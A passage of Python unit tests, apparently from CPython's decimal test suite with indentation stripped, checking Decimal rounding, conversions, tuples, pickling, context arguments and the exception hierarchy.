self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NaNs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
Decimal = self.decimal.Decimal
# exceptional cases
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('inf'))
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('-inf'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('-nan'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('snan123'))
for exp in range(-4, 2):
for coeff in range(1000):
for sign in '+', '-':
d = Decimal('%s%dE%d' % (sign, coeff, exp))
pq = d.as_integer_ratio()
p, q = pq
# check return type
self.assertIsInstance(pq, tuple)
self.assertIsInstance(p, int)
self.assertIsInstance(q, int)
# check normalization: q should be positive;
# p should be relatively prime to q.
self.assertGreater(q, 0)
self.assertEqual(math.gcd(p, q), 1)
# check that p/q actually gives the correct value
self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d, proto)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
def __init__(self, _):
self.x = 'y'
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertEqual(r.x, 'y')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
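# xc is a deliberately tiny context (prec=1, Emax=1, Emin=-1) so that the
# explicit context=xc arguments below force rounding and overflow; c is the
# ambient context and its flags must stay clean throughout.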
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
